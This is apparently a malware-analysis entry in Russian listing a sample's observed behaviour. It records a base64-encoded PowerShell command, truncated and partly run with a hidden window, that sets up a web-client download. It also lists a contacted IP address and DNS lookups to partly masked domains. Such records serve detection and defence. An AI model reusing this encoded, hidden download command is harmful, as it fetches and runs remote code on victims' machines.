Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqADMAMwA5ADQAXwA9ACgAJwB3AF8AJwArACcANwA2AF8AMgAnACsAJwBfAF8AJwApADsAJABkAF8AMwA4ADAAOAAxADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBfADQANAA0ADgAPQAoAC...
- '13#.#9.182.250':80
- DNS ASK eu#####dusedtires.com
- DNS ASK gu###joeris.com
- DNS ASK gu######ahandball.com.br
- DNS ASK cc##ike.cn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqADMAMwA5ADQAXwA9ACgAJwB3AF8AJwArACcANwA2AF8AMgAnACsAJwBfAF8AJwApADsAJABkAF8AMwA4ADAAOAAxADgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBfADQANAA0ADgAPQAoAC...' (со скрытым окном)